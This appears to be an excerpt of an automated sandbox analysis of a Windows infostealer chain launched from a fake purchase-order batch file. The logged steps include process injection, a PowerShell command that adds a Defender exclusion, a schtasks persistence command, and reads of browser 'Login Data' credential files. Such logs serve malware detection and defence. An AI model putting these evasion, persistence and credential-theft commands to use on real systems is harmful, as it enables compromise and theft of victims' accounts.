                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 2FB008
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 2C7008
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 296008
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_02C35A78
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: GetLocaleInfoA,6_2_02C3A798
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: GetLocaleInfoA,6_2_02C3A74C
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_02C35B84
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: GetLocaleInfoA,10_1_00417A20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: GetLocaleInfoA,24_2_00417A20
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,25_2_02DB5A78
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Code function: GetLocaleInfoA,25_2_02DBA798
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,25_2_02DB5B83
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: GetLocaleInfoA,29_2_00417A20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Code function: GetLocaleInfoA,29_1_00417A20
                      Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C39194 GetLocalTime,6_2_02C39194
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3B714 GetVersionExA,6_2_02C3B714
                      Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara match File source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b93f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0000.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.3.rpkhzpuO.pif.2ffbae98.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0f08.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26485570.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.34b30000.11.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b94e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b94e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f76478.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed3f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed4e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32fb3d90.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f76478.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.25380000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed3f56.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32fb3d90.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b93f56.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.3.rpkhzpuO.pif.2d0de3e8.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.3.rpkhzpuO.pif.234e1460.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0f08.9.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.3.rpkhzpuO.pif.234e1460.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26486478.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.3.rpkhzpuO.pif.2d0de3e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26486478.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0f08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.34b30000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f75570.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0f08.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.264c3d90.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.264c3d90.11.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26485570.9.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f75570.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.25380000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed4e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.3.rpkhzpuO.pif.2ffbae98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2871352037.0000000025380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara match File source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000D.00000002.4634725765.000000000269F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000D.00000002.4634725765.0000000002794000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                      Remote Access Functionality

                      Source: Yara match File source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b93f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0000.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.3.rpkhzpuO.pif.2ffbae98.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0f08.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26485570.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.34b30000.11.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b94e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b94e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f76478.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed3f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed4e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32fb3d90.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f76478.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.25380000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.24ed3f56.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32fb3d90.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.31b93f56.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.3.rpkhzpuO.pif.2d0de3e8.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.3.rpkhzpuO.pif.234e1460.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0f08.9.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.3.rpkhzpuO.pif.234e1460.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26486478.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.3.rpkhzpuO.pif.2d0de3e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26486478.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0f08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.34b30000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.32f75570.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.rpkhzpuO.pif.343b0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.250f0f08.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.264c3d90.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.264c3d90.11.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 29.2.rpkhzpuO.pif.26485570.9.unpack, type: UNPACKEDPE
